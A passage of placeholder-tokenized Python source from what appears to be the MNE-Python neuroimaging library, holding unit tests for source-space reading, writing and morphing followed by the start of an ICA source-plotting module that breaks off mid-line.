"""<STR_LIT>""" <EOL> tempdir = _TempDir ( ) <EOL> src = read_source_spaces ( fname ) <EOL> src_new = read_source_spaces ( fname ) <EOL> del src_new [ <NUM_LIT:0> ] [ '<STR_LIT>' ] <EOL> del src_new [ <NUM_LIT:1> ] [ '<STR_LIT>' ] <EOL> n_do = <NUM_LIT> <EOL> src_new [ <NUM_LIT:0> ] [ '<STR_LIT>' ] = src_new [ <NUM_LIT:0> ] [ '<STR_LIT>' ] [ : n_do ] . copy ( ) <EOL> src_new [ <NUM_LIT:1> ] [ '<STR_LIT>' ] = src_new [ <NUM_LIT:1> ] [ '<STR_LIT>' ] [ : n_do ] . copy ( ) <EOL> out_name = op . join ( tempdir , '<STR_LIT>' ) <EOL> n_jobs = <NUM_LIT:2> <EOL> assert_true ( n_do % n_jobs != <NUM_LIT:0> ) <EOL> add_source_space_distances ( src_new , n_jobs = n_jobs ) <EOL> write_source_spaces ( out_name , src_new ) <EOL> src_new = read_source_spaces ( out_name ) <EOL> for so , sn in zip ( src , src_new ) : <EOL> v = so [ '<STR_LIT>' ] [ : n_do ] <EOL> assert_array_equal ( so [ '<STR_LIT>' ] , np . array ( [ - <NUM_LIT> ] , np . float32 ) ) <EOL> assert_array_equal ( sn [ '<STR_LIT>' ] , np . array ( [ np . inf ] , np . float32 ) ) <EOL> do = so [ '<STR_LIT>' ] <EOL> dn = sn [ '<STR_LIT>' ] <EOL> ds = list ( ) <EOL> for d in [ do , dn ] : <EOL> d . data [ d . data > <NUM_LIT> ] = <NUM_LIT:0> <EOL> d = d [ v ] [ : , v ] <EOL> d . eliminate_zeros ( ) <EOL> ds . append ( d ) <EOL> assert_true ( np . sum ( ds [ <NUM_LIT:0> ] . data < <NUM_LIT> ) > <NUM_LIT:10> ) <EOL> d = ds [ <NUM_LIT:0> ] - ds [ <NUM_LIT:1> ] <EOL> assert_allclose ( np . zeros_like ( d . data ) , d . data , rtol = <NUM_LIT:0> , atol = <NUM_LIT> ) <EOL> @ testing . requires_testing_data <EOL> @ requires_mne <EOL> def test_discrete_source_space ( ) : <EOL> """<STR_LIT>""" <EOL> tempdir = _TempDir ( ) <EOL> src = read_source_spaces ( fname ) <EOL> v = src [ <NUM_LIT:0> ] [ '<STR_LIT>' ] <EOL> temp_name = op . join ( tempdir , '<STR_LIT>' ) <EOL> try : <EOL> temp_pos = op . join ( tempdir , '<STR_LIT>' ) <EOL> np . savetxt ( temp_pos , np . c_ [ src [ <NUM_LIT:0> ] [ '<STR_LIT>' ] [ v ] , src [ <NUM_LIT:0> ] [ '<STR_LIT>' ] [ v ] ] ) <EOL> run_subprocess ( [ '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , temp_pos , '<STR_LIT>' , temp_name ] ) <EOL> src_c = read_source_spaces ( temp_name ) <EOL> pos_dict = dict ( rr = src [ <NUM_LIT:0> ] [ '<STR_LIT>' ] [ v ] , nn = src [ <NUM_LIT:0> ] [ '<STR_LIT>' ] [ v ] ) <EOL> src_new = setup_volume_source_space ( '<STR_LIT>' , None , <EOL> pos = pos_dict , <EOL> subjects_dir = subjects_dir ) <EOL> _compare_source_spaces ( src_c , src_new , mode = '<STR_LIT>' ) <EOL> assert_allclose ( src [ <NUM_LIT:0> ] [ '<STR_LIT>' ] [ v ] , src_new [ <NUM_LIT:0> ] [ '<STR_LIT>' ] , <EOL> rtol = <NUM_LIT> , atol = <NUM_LIT> ) <EOL> assert_allclose ( src [ <NUM_LIT:0> ] [ '<STR_LIT>' ] [ v ] , src_new [ <NUM_LIT:0> ] [ '<STR_LIT>' ] , <EOL> rtol = <NUM_LIT> , atol = <NUM_LIT> ) <EOL> write_source_spaces ( temp_name , src_c ) <EOL> src_c2 = read_source_spaces ( temp_name ) <EOL> _compare_source_spaces ( src_c , src_c2 ) <EOL> assert_raises ( ValueError , setup_volume_source_space , '<STR_LIT>' , <EOL> pos = pos_dict , mri = fname_mri ) <EOL> finally : <EOL> if op . isfile ( temp_name ) : <EOL> os . remove ( temp_name ) <EOL> @ slow_test <EOL> @ testing . requires_testing_data <EOL> def test_volume_source_space ( ) : <EOL> """<STR_LIT>""" <EOL> tempdir = _TempDir ( ) <EOL> src = read_source_spaces ( fname_vol ) <EOL> temp_name = op . join ( tempdir , '<STR_LIT>' ) <EOL> surf = read_bem_surfaces ( fname_bem , s_id = FIFF . FIFFV_BEM_SURF_ID_BRAIN ) <EOL> surf [ '<STR_LIT>' ] *= <NUM_LIT> <EOL> for bem , surf in zip ( ( fname_bem , None ) , ( None , surf ) ) : <EOL> src_new = setup_volume_source_space ( '<STR_LIT>' , temp_name , pos = <NUM_LIT> , <EOL> bem = bem , surface = surf , <EOL> mri = fname_mri , <EOL> subjects_dir = subjects_dir ) <EOL> _compare_source_spaces ( src , src_new , mode = '<STR_LIT>' ) <EOL> del src_new <EOL> src_new = read_source_spaces ( temp_name ) <EOL> _compare_source_spaces ( src , src_new , mode = '<STR_LIT>' ) <EOL> assert_raises ( IOError , setup_volume_source_space , '<STR_LIT>' , temp_name , <EOL> pos = <NUM_LIT> , bem = None , surface = '<STR_LIT:foo>' , <EOL> mri = fname_mri , subjects_dir = subjects_dir ) <EOL> @ testing . requires_testing_data <EOL> @ requires_mne <EOL> def test_other_volume_source_spaces ( ) : <EOL> """<STR_LIT>""" <EOL> tempdir = _TempDir ( ) <EOL> temp_name = op . join ( tempdir , '<STR_LIT>' ) <EOL> run_subprocess ( [ '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , temp_name , <EOL> '<STR_LIT>' , fname_mri ] ) <EOL> src = read_source_spaces ( temp_name ) <EOL> src_new = setup_volume_source_space ( '<STR_LIT>' , temp_name , pos = <NUM_LIT> , <EOL> mri = fname_mri , <EOL> subjects_dir = subjects_dir ) <EOL> _compare_source_spaces ( src , src_new , mode = '<STR_LIT>' ) <EOL> del src <EOL> del src_new <EOL> assert_raises ( ValueError , setup_volume_source_space , '<STR_LIT>' , temp_name , <EOL> pos = <NUM_LIT> , sphere = [ <NUM_LIT:1.> , <NUM_LIT:1.> ] , mri = fname_mri , <EOL> subjects_dir = subjects_dir ) <EOL> run_subprocess ( [ '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , temp_name ] ) <EOL> assert_raises ( ValueError , read_source_spaces , temp_name ) <EOL> @ testing . requires_testing_data <EOL> def test_triangle_neighbors ( ) : <EOL> """<STR_LIT>""" <EOL> this = read_source_spaces ( fname ) [ <NUM_LIT:0> ] <EOL> this [ '<STR_LIT>' ] = [ list ( ) for _ in range ( this [ '<STR_LIT>' ] ) ] <EOL> for p in range ( this [ '<STR_LIT>' ] ) : <EOL> verts = this [ '<STR_LIT>' ] [ p ] <EOL> this [ '<STR_LIT>' ] [ verts [ <NUM_LIT:0> ] ] . append ( p ) <EOL> this [ '<STR_LIT>' ] [ verts [ <NUM_LIT:1> ] ] . append ( p ) <EOL> this [ '<STR_LIT>' ] [ verts [ <NUM_LIT:2> ] ] . append ( p ) <EOL> this [ '<STR_LIT>' ] = [ np . array ( nb , int ) for nb in this [ '<STR_LIT>' ] ] <EOL> neighbor_tri = _triangle_neighbors ( this [ '<STR_LIT>' ] , this [ '<STR_LIT>' ] ) <EOL> assert_true ( np . array_equal ( nt1 , nt2 ) <EOL> for nt1 , nt2 in zip ( neighbor_tri , this [ '<STR_LIT>' ] ) ) <EOL> def test_accumulate_normals ( ) : <EOL> """<STR_LIT>""" <EOL> n_pts = int ( <NUM_LIT> ) <EOL> n_tris = int ( <NUM_LIT> ) <EOL> tris = ( rng . rand ( n_tris , <NUM_LIT:1> ) * ( n_pts - <NUM_LIT:2> ) ) . astype ( int ) <EOL> tris = np . c_ [ tris , tris + <NUM_LIT:1> , tris + <NUM_LIT:2> ] <EOL> tri_nn = rng . rand ( n_tris , <NUM_LIT:3> ) <EOL> this = dict ( tris = tris , np = n_pts , ntri = n_tris , tri_nn = tri_nn ) <EOL> this [ '<STR_LIT>' ] = np . zeros ( ( this [ '<STR_LIT>' ] , <NUM_LIT:3> ) ) <EOL> for p in range ( this [ '<STR_LIT>' ] ) : <EOL> verts = this [ '<STR_LIT>' ] [ p ] <EOL> this [ '<STR_LIT>' ] [ verts , : ] += this [ '<STR_LIT>' ] [ p , : ] <EOL> nn = _accumulate_normals ( this [ '<STR_LIT>' ] , this [ '<STR_LIT>' ] , this [ '<STR_LIT>' ] ) <EOL> assert_allclose ( nn , this [ '<STR_LIT>' ] , rtol = <NUM_LIT> , atol = <NUM_LIT> ) <EOL> @ slow_test <EOL> @ testing . requires_testing_data <EOL> def test_setup_source_space ( ) : <EOL> """<STR_LIT>""" <EOL> tempdir = _TempDir ( ) <EOL> fname_ico = op . join ( data_path , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' ) <EOL> assert_raises ( ValueError , setup_source_space , '<STR_LIT>' , spacing = '<STR_LIT>' , <EOL> add_dist = False ) <EOL> assert_raises ( ValueError , setup_source_space , '<STR_LIT>' , spacing = '<STR_LIT>' , <EOL> add_dist = False ) <EOL> assert_raises ( ValueError , setup_source_space , '<STR_LIT>' , spacing = '<STR_LIT>' , <EOL> add_dist = False ) <EOL> assert_raises ( ValueError , setup_source_space , '<STR_LIT>' , spacing = '<STR_LIT>' , <EOL> add_dist = False ) <EOL> assert_raises ( ValueError , setup_source_space , '<STR_LIT>' , spacing = '<STR_LIT>' , <EOL> add_dist = False ) <EOL> assert_raises ( IOError , setup_source_space , '<STR_LIT>' , spacing = '<STR_LIT>' , <EOL> subjects_dir = subjects_dir , add_dist = False ) <EOL> src = read_source_spaces ( fname_ico ) <EOL> temp_name = op . join ( tempdir , '<STR_LIT>' ) <EOL> with warnings . catch_warnings ( record = True ) : <EOL> warnings . simplefilter ( '<STR_LIT>' ) <EOL> src_new = setup_source_space ( '<STR_LIT>' , temp_name , spacing = '<STR_LIT>' , <EOL> subjects_dir = subjects_dir , add_dist = False , <EOL> overwrite = True ) <EOL> _compare_source_spaces ( src , src_new , mode = '<STR_LIT>' ) <EOL> assert_array_equal ( src [ <NUM_LIT:0> ] [ '<STR_LIT>' ] , np . arange ( <NUM_LIT> ) ) <EOL> assert_array_equal ( src [ <NUM_LIT:1> ] [ '<STR_LIT>' ] , np . arange ( <NUM_LIT> ) ) <EOL> src = read_source_spaces ( fname ) <EOL> temp_name = op . join ( tempdir , '<STR_LIT>' ) <EOL> with warnings . catch_warnings ( record = True ) : <EOL> warnings . simplefilter ( '<STR_LIT>' ) <EOL> src_new = setup_source_space ( '<STR_LIT>' , temp_name , spacing = '<STR_LIT>' , <EOL> subjects_dir = subjects_dir , <EOL> overwrite = True , add_dist = False ) <EOL> _compare_source_spaces ( src , src_new , mode = '<STR_LIT>' , nearest = False ) <EOL> src_new = read_source_spaces ( temp_name ) <EOL> _compare_source_spaces ( src , src_new , mode = '<STR_LIT>' , nearest = False ) <EOL> src_new = setup_source_space ( '<STR_LIT>' , None , spacing = '<STR_LIT:all>' , <EOL> subjects_dir = subjects_dir , add_dist = False ) <EOL> assert_true ( src_new [ <NUM_LIT:0> ] [ '<STR_LIT>' ] == len ( src_new [ <NUM_LIT:0> ] [ '<STR_LIT>' ] ) ) <EOL> assert_true ( src_new [ <NUM_LIT:1> ] [ '<STR_LIT>' ] == len ( src_new [ <NUM_LIT:1> ] [ '<STR_LIT>' ] ) ) <EOL> assert_raises ( RuntimeError , setup_source_space , '<STR_LIT>' , None , <EOL> spacing = '<STR_LIT>' , subjects_dir = subjects_dir , add_dist = False ) <EOL> @ testing . requires_testing_data <EOL> def test_read_source_spaces ( ) : <EOL> """<STR_LIT>""" <EOL> src = read_source_spaces ( fname , patch_stats = True ) <EOL> lh_points = src [ <NUM_LIT:0> ] [ '<STR_LIT>' ] <EOL> lh_faces = src [ <NUM_LIT:0> ] [ '<STR_LIT>' ] <EOL> lh_use_faces = src [ <NUM_LIT:0> ] [ '<STR_LIT>' ] <EOL> rh_points = src [ <NUM_LIT:1> ] [ '<STR_LIT>' ] <EOL> rh_faces = src [ <NUM_LIT:1> ] [ '<STR_LIT>' ] <EOL> rh_use_faces = src [ <NUM_LIT:1> ] [ '<STR_LIT>' ] <EOL> assert_true ( lh_faces . min ( ) == <NUM_LIT:0> ) <EOL> assert_true ( lh_faces . max ( ) == lh_points . shape [ <NUM_LIT:0> ] - <NUM_LIT:1> ) <EOL> assert_true ( lh_use_faces . min ( ) >= <NUM_LIT:0> ) <EOL> assert_true ( lh_use_faces . max ( ) <= lh_points . shape [ <NUM_LIT:0> ] - <NUM_LIT:1> ) <EOL> assert_true ( rh_faces . min ( ) == <NUM_LIT:0> ) <EOL> assert_true ( rh_faces . max ( ) == rh_points . shape [ <NUM_LIT:0> ] - <NUM_LIT:1> ) <EOL> assert_true ( rh_use_faces . min ( ) >= <NUM_LIT:0> ) <EOL> assert_true ( rh_use_faces . max ( ) <= rh_points . shape [ <NUM_LIT:0> ] - <NUM_LIT:1> ) <EOL> @ slow_test <EOL> @ testing . requires_testing_data <EOL> def test_write_source_space ( ) : <EOL> """<STR_LIT>""" <EOL> tempdir = _TempDir ( ) <EOL> src0 = read_source_spaces ( fname , patch_stats = False ) <EOL> write_source_spaces ( op . join ( tempdir , '<STR_LIT>' ) , src0 ) <EOL> src1 = read_source_spaces ( op . join ( tempdir , '<STR_LIT>' ) , <EOL> patch_stats = False ) <EOL> _compare_source_spaces ( src0 , src1 ) <EOL> with warnings . catch_warnings ( record = True ) as w : <EOL> warnings . simplefilter ( '<STR_LIT>' ) <EOL> src_badname = op . join ( tempdir , '<STR_LIT>' ) <EOL> write_source_spaces ( src_badname , src0 ) <EOL> read_source_spaces ( src_badname ) <EOL> assert_naming ( w , '<STR_LIT>' , <NUM_LIT:2> ) <EOL> @ testing . requires_testing_data <EOL> @ requires_fs_or_nibabel <EOL> def test_vertex_to_mni ( ) : <EOL> """<STR_LIT>""" <EOL> vertices = [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] <EOL> coords = np . array ( [ [ - <NUM_LIT> , - <NUM_LIT> , - <NUM_LIT> ] , [ - <NUM_LIT> , - <NUM_LIT> , - <NUM_LIT> ] , <EOL> [ - <NUM_LIT> , <NUM_LIT> , - <NUM_LIT> ] , [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] ] ) <EOL> hemis = [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:1> ] <EOL> coords_2 = vertex_to_mni ( vertices , hemis , '<STR_LIT>' , subjects_dir ) <EOL> assert_allclose ( coords , coords_2 , atol = <NUM_LIT:1.0> ) <EOL> @ testing . requires_testing_data <EOL> @ requires_freesurfer <EOL> @ requires_nibabel ( ) <EOL> def test_vertex_to_mni_fs_nibabel ( ) : <EOL> """<STR_LIT>""" <EOL> n_check = <NUM_LIT:1000> <EOL> subject = '<STR_LIT>' <EOL> vertices = rng . randint ( <NUM_LIT:0> , <NUM_LIT> , n_check ) <EOL> hemis = rng . randint ( <NUM_LIT:0> , <NUM_LIT:1> , n_check ) <EOL> coords = vertex_to_mni ( vertices , hemis , subject , subjects_dir , <EOL> '<STR_LIT>' ) <EOL> coords_2 = vertex_to_mni ( vertices , hemis , subject , subjects_dir , <EOL> '<STR_LIT>' ) <EOL> assert_allclose ( coords , coords_2 , atol = <NUM_LIT:0.1> ) <EOL> @ testing . requires_testing_data <EOL> @ requires_freesurfer <EOL> @ requires_nibabel ( ) <EOL> def test_get_volume_label_names ( ) : <EOL> """<STR_LIT>""" <EOL> aseg_fname = op . join ( subjects_dir , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> label_names = get_volume_labels_from_aseg ( aseg_fname ) <EOL> assert_equal ( label_names . count ( '<STR_LIT>' ) , <NUM_LIT:1> ) <EOL> @ testing . requires_testing_data <EOL> @ requires_freesurfer <EOL> @ requires_nibabel ( ) <EOL> def test_source_space_from_label ( ) : <EOL> """<STR_LIT>""" <EOL> tempdir = _TempDir ( ) <EOL> aseg_fname = op . join ( subjects_dir , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> label_names = get_volume_labels_from_aseg ( aseg_fname ) <EOL> volume_label = label_names [ int ( np . random . rand ( ) * len ( label_names ) ) ] <EOL> pos = dict ( ) <EOL> assert_raises ( ValueError , setup_volume_source_space , '<STR_LIT>' , pos = pos , <EOL> volume_label = volume_label , mri = aseg_fname ) <EOL> assert_raises ( RuntimeError , setup_volume_source_space , '<STR_LIT>' , mri = None , <EOL> volume_label = volume_label ) <EOL> assert_raises ( ValueError , setup_volume_source_space , '<STR_LIT>' , <EOL> volume_label = '<STR_LIT>' , mri = aseg_fname ) <EOL> src = setup_volume_source_space ( '<STR_LIT>' , subjects_dir = subjects_dir , <EOL> volume_label = volume_label , mri = aseg_fname , <EOL> add_interpolator = False ) <EOL> assert_equal ( volume_label , src [ <NUM_LIT:0> ] [ '<STR_LIT>' ] ) <EOL> out_name = op . join ( tempdir , '<STR_LIT>' ) <EOL> write_source_spaces ( out_name , src ) <EOL> src_from_file = read_source_spaces ( out_name ) <EOL> _compare_source_spaces ( src , src_from_file , mode = '<STR_LIT>' ) <EOL> @ testing . requires_testing_data <EOL> @ requires_freesurfer <EOL> @ requires_nibabel ( ) <EOL> def test_combine_source_spaces ( ) : <EOL> """<STR_LIT>""" <EOL> tempdir = _TempDir ( ) <EOL> aseg_fname = op . join ( subjects_dir , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> label_names = get_volume_labels_from_aseg ( aseg_fname ) <EOL> volume_labels = [ label_names [ int ( np . random . rand ( ) * len ( label_names ) ) ] <EOL> for ii in range ( <NUM_LIT:2> ) ] <EOL> srf = read_source_spaces ( fname , patch_stats = False ) <EOL> vol = setup_volume_source_space ( '<STR_LIT>' , subjects_dir = subjects_dir , <EOL> volume_label = volume_labels [ <NUM_LIT:0> ] , <EOL> mri = aseg_fname , add_interpolator = False ) <EOL> rr = rng . randint ( <NUM_LIT:0> , <NUM_LIT:20> , ( <NUM_LIT:100> , <NUM_LIT:3> ) ) * <NUM_LIT> <EOL> nn = np . zeros ( rr . shape ) <EOL> nn [ : , - <NUM_LIT:1> ] = <NUM_LIT:1> <EOL> pos = { '<STR_LIT>' : rr , '<STR_LIT>' : nn } <EOL> disc = setup_volume_source_space ( '<STR_LIT>' , subjects_dir = subjects_dir , <EOL> pos = pos , verbose = '<STR_LIT:error>' ) <EOL> src = srf + vol + disc <EOL> assert_equal ( type ( src ) , SourceSpaces ) <EOL> assert_equal ( len ( src ) , <NUM_LIT:4> ) <EOL> src_out_name = op . join ( tempdir , '<STR_LIT>' ) <EOL> src . save ( src_out_name ) <EOL> src_from_file = read_source_spaces ( src_out_name ) <EOL> _compare_source_spaces ( src , src_from_file , mode = '<STR_LIT>' ) <EOL> coord_frames = np . array ( [ s [ '<STR_LIT>' ] for s in src ] ) <EOL> assert_true ( ( coord_frames == FIFF . FIFFV_COORD_MRI ) . all ( ) ) <EOL> image_fname = op . join ( tempdir , '<STR_LIT>' ) <EOL> assert_raises ( ValueError , srf . export_volume , image_fname , verbose = '<STR_LIT:error>' ) <EOL> disc2 = disc . copy ( ) <EOL> disc2 [ <NUM_LIT:0> ] [ '<STR_LIT:type>' ] = '<STR_LIT>' <EOL> src_unrecognized = src + disc2 <EOL> assert_raises ( ValueError , src_unrecognized . export_volume , image_fname , <EOL> verbose = '<STR_LIT:error>' ) <EOL> bad_image_fname = op . join ( tempdir , '<STR_LIT>' ) <EOL> with warnings . catch_warnings ( record = True ) : <EOL> assert_raises ( ValueError , src . export_volume , bad_image_fname , <EOL> verbose = '<STR_LIT:error>' ) <EOL> disc3 = disc . copy ( ) <EOL> disc3 [ <NUM_LIT:0> ] [ '<STR_LIT>' ] = <NUM_LIT:10> <EOL> src_mixed_coord = src + disc3 <EOL> assert_raises ( ValueError , src_mixed_coord . export_volume , image_fname , <EOL> verbose = '<STR_LIT:error>' ) <EOL> @ testing . requires_testing_data <EOL> def test_morph_source_spaces ( ) : <EOL> """<STR_LIT>""" <EOL> src = read_source_spaces ( fname_fs ) <EOL> src_morph = read_source_spaces ( fname_morph ) <EOL> src_morph_py = morph_source_spaces ( src , '<STR_LIT>' , <EOL> subjects_dir = subjects_dir ) <EOL> _compare_source_spaces ( src_morph , src_morph_py , mode = '<STR_LIT>' ) <EOL> @ slow_test <EOL> @ testing . requires_testing_data <EOL> def test_morphed_source_space_return ( ) : <EOL> """<STR_LIT>""" <EOL> data = rng . randn ( <NUM_LIT> , <NUM_LIT:1> ) <EOL> tmin , tstep = <NUM_LIT:0> , <NUM_LIT:1.> <EOL> src_fs = read_source_spaces ( fname_fs ) <EOL> stc_fs = SourceEstimate ( data , [ s [ '<STR_LIT>' ] for s in src_fs ] , <EOL> tmin , tstep , '<STR_LIT>' ) <EOL> src_morph = morph_source_spaces ( src_fs , '<STR_LIT>' , <EOL> subjects_dir = subjects_dir ) <EOL> stc_morph = stc_fs . morph ( '<STR_LIT>' , [ s [ '<STR_LIT>' ] for s in src_morph ] , <EOL> smooth = <NUM_LIT:1> , subjects_dir = subjects_dir ) <EOL> keeps = [ np . sort ( rng . permutation ( np . arange ( len ( v ) ) ) [ : len ( v ) - <NUM_LIT:10> ] ) <EOL> for v in stc_morph . vertices ] <EOL> stc_morph = SourceEstimate ( <EOL> np . concatenate ( [ stc_morph . lh_data [ keeps [ <NUM_LIT:0> ] ] , <EOL> stc_morph . rh_data [ keeps [ <NUM_LIT:1> ] ] ] ) , <EOL> [ v [ k ] for v , k in zip ( stc_morph . vertices , keeps ) ] , tmin , tstep , <EOL> '<STR_LIT>' ) <EOL> stc_morph_return = stc_morph . to_original_src ( <EOL> src_fs , subjects_dir = subjects_dir ) <EOL> stc_morph_morph = stc_morph . morph ( '<STR_LIT>' , stc_morph_return . vertices , <EOL> smooth = <NUM_LIT:1> , <EOL> subjects_dir = subjects_dir ) <EOL> assert_equal ( stc_morph_return . subject , stc_morph_morph . subject ) <EOL> for ii in range ( <NUM_LIT:2> ) : <EOL> assert_array_equal ( stc_morph_return . vertices [ ii ] , <EOL> stc_morph_morph . vertices [ ii ] ) <EOL> corr = np . corrcoef ( stc_morph_return . data [ : , <NUM_LIT:0> ] , <EOL> stc_morph_morph . data [ : , <NUM_LIT:0> ] ) [ <NUM_LIT:0> , <NUM_LIT:1> ] <EOL> assert_true ( corr > <NUM_LIT> , corr ) <EOL> stc_morph . subject = None <EOL> assert_raises ( ValueError , stc_morph . to_original_src , <EOL> src_fs , subject_orig = '<STR_LIT>' , subjects_dir = subjects_dir ) <EOL> stc_morph . subject = '<STR_LIT>' <EOL> del src_fs [ <NUM_LIT:0> ] [ '<STR_LIT>' ] <EOL> assert_raises ( ValueError , stc_morph . to_original_src , <EOL> src_fs , subjects_dir = subjects_dir ) <EOL> src_fs [ <NUM_LIT:0> ] [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> assert_raises ( ValueError , stc_morph . to_original_src , <EOL> src_fs , subject_orig = '<STR_LIT:foo>' , subjects_dir = subjects_dir ) <EOL> src_fs [ <NUM_LIT:0> ] [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> src = read_source_spaces ( fname ) <EOL> assert_raises ( RuntimeError , stc_morph . to_original_src , <EOL> src , subjects_dir = subjects_dir ) <EOL> run_tests_if_main ( ) <EOL> """<STR_LIT>""" </s>
<s> """<STR_LIT>""" <EOL> from __future__ import print_function <EOL> from functools import partial <EOL> import numpy as np <EOL> from . utils import ( tight_layout , _prepare_trellis , _select_bads , <EOL> _layout_figure , _plot_raw_onscroll , _mouse_click , <EOL> _helper_raw_resize , _plot_raw_onkey , plt_show ) <EOL> from . raw import _prepare_mne_browse_raw , _plot_raw_traces <EOL> from . epochs import _prepare_mne_browse_epochs <EOL> from . evoked import _butterfly_on_button_press , _butterfly_onpick <EOL> from . topomap import _prepare_topo_plot , plot_topomap , _hide_frame <EOL> from . . utils import warn <EOL> from . . defaults import _handle_default <EOL> from . . io . meas_info import create_info <EOL> from . . io . pick import pick_types <EOL> from . . externals . six import string_types <EOL> def _ica_plot_sources_onpick_ ( event , sources = None , ylims = None ) : <EOL> """<STR_LIT>""" <EOL> if event . mouseevent . inaxes is None or event . mouseevent . button != <NUM_LIT:1> : <EOL> return <EOL> artist = event . artist <EOL> try : <EOL> import matplotlib . pyplot as plt <EOL> plt . figure ( ) <EOL> src_idx = artist . _mne_src_idx <EOL> component = artist . _mne_component <EOL> plt . plot ( sources [ src_idx ] , '<STR_LIT:r>' if artist . _mne_is_bad else '<STR_LIT:k>' ) <EOL> plt . ylim ( ylims ) <EOL> plt . grid ( linestyle = '<STR_LIT:->' , color = '<STR_LIT>' , linewidth = <NUM_LIT> ) <EOL> plt . title ( '<STR_LIT>' % component ) <EOL> except Exception as err : <EOL> print ( err ) <EOL> raise err <EOL> def plot_ica_sources ( ica , inst , picks = None , exclude = None , start = None , <EOL> stop = None , show = True , title = None , block = False ) : <EOL> """<STR_LIT>""" <EOL> from . . io . base import _BaseRaw <EOL> from . . evoked import Evoked <EOL> from . . epochs import _BaseEpochs <EOL> if exclude is None : <EOL> exclude = ica . exclude <EOL> elif len ( ica . exclude ) > <NUM_LIT:0> : <EOL> exclude = np . union1d ( ica . exclude , exclude ) <EOL> if isinstance ( inst , _BaseRaw ) : <EOL> fig = _plot_sources_raw ( ica , inst , picks , exclude , start = start , <EOL> stop = stop , show = show , title = title , <EOL> block = block ) <EOL> elif isinstance ( inst , _BaseEpochs ) : <EOL> fig = _plot_sources_epochs ( ica , inst , picks , exclude , start = start , <EOL> stop = stop , show = show , title = title , <EOL> block = block ) <EOL> elif isinstance ( inst , Evoked ) : <EOL> sources = ica . get_sources ( inst ) <EOL> if start is not None or stop is not None : <EOL> inst = inst . copy ( ) . crop ( start , stop ) <EOL> fig = _plot_ica_sources_evoked ( <EOL> evoked = sources , picks = picks , exclude = exclude , title = title , <EOL> labels = getattr ( ica , '<STR_LIT>' , None ) , show = show ) <EOL> else : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> return fig <EOL> def _plot_ica_grid ( sources , start , stop , <EOL> source_idx , ncol , exclude , <EOL> title , show ) : <EOL> """<STR_LIT>""" <EOL> import matplotlib . pyplot as plt <EOL> if source_idx is None : <EOL> source_idx = np . arange ( len ( sources ) ) <EOL> elif isinstance ( source_idx , list ) : <EOL> source_idx = np . array ( source_idx ) <EOL> if exclude is None : <EOL> exclude = [ ] <EOL> n_components = len ( sources ) <EOL> ylims = sources . min ( ) , sources . max ( ) <EOL> xlims = np . arange ( sources . shape [ - <NUM_LIT:1> ] ) [ [ <NUM_LIT:0> , - <NUM_LIT:1> ] ] <EOL> fig , axes = _prepare_trellis ( n_components , ncol ) <EOL> if title is None : <EOL> fig . suptitle ( '<STR_LIT>' , size = <NUM_LIT:16> ) <EOL> elif title : <EOL> fig . suptitle ( title , size = <NUM_LIT:16> ) <EOL> plt . subplots_adjust ( wspace = <NUM_LIT> , hspace = <NUM_LIT> ) <EOL> my_iter = enumerate ( zip ( source_idx , axes , sources ) ) <EOL> for i_source , ( i_selection , ax , source ) in my_iter : <EOL> component = '<STR_LIT>' % i_selection <EOL> color = '<STR_LIT:r>' if i_selection in exclude else '<STR_LIT:k>' <EOL> line = ax . plot ( source , linewidth = <NUM_LIT:0.5> , color = color , picker = <NUM_LIT> ) [ <NUM_LIT:0> ] <EOL> vars ( line ) [ '<STR_LIT>' ] = i_source <EOL> vars ( line ) [ '<STR_LIT>' ] = i_selection <EOL> vars ( line ) [ '<STR_LIT>' ] = i_selection in exclude <EOL> ax . set_xlim ( xlims ) <EOL> ax . set_ylim ( ylims ) <EOL> ax . text ( <NUM_LIT> , <NUM_LIT> , component , transform = ax . transAxes , <EOL> verticalalignment = '<STR_LIT>' ) <EOL> plt . setp ( ax . get_xticklabels ( ) , visible = False ) <EOL> plt . setp ( ax . get_yticklabels ( ) , visible = False ) <EOL> callback = partial ( _ica_plot_sources_onpick_ , sources = sources , ylims = ylims ) <EOL> fig . canvas . mpl_connect ( '<STR_LIT>' , callback ) <EOL> plt_show ( show ) <EOL> return fig <EOL> def _plot_ica_sources_evoked ( evoked , picks , exclude , title , show , labels = None ) : <EOL> """<STR_LIT>""" <EOL> import matplotlib . pyplot as plt <EOL> if title is None : <EOL> title = '<STR_LIT>' <EOL> fig , axes = plt . subplots ( <NUM_LIT:1> ) <EOL> ax = axes <EOL> axes = [ axes ] <EOL> idxs = [ <NUM_LIT:0> ] <EOL> times = evoked . times * <NUM_LIT> <EOL> lines = list ( ) <EOL> texts = list ( ) <EOL> if picks is None : <EOL> picks = np . arange ( evoked . data . shape [ <NUM_LIT:0> ] ) <EOL> picks = np . sort ( picks ) <EOL> idxs = [ picks ] <EOL> color = '<STR_LIT:r>' <EOL> if labels is not None : <EOL> labels_used = [ k for k in labels if '<STR_LIT:/>' not in k ] <EOL> exclude_labels = list ( ) <EOL> for ii in picks : <EOL> if ii in exclude : <EOL> line_label = '<STR_LIT>' % ( ii + <NUM_LIT:1> ) <EOL> if labels is not None : <EOL> annot = list ( ) <EOL> for this_label in labels_used : <EOL> indices = labels [ this_label ] <EOL> if ii in indices : <EOL> annot . append ( this_label ) <EOL> line_label += ( '<STR_LIT>' + '<STR_LIT:U+002CU+0020>' . join ( annot ) ) <EOL> exclude_labels . append ( line_label ) <EOL> else : <EOL> exclude_labels . append ( None ) <EOL> if labels is not None : <EOL> unique_labels = set ( [ k . split ( '<STR_LIT>' ) [ <NUM_LIT:1> ] for k in exclude_labels if k ] ) <EOL> label_colors = plt . cm . rainbow ( np . linspace ( 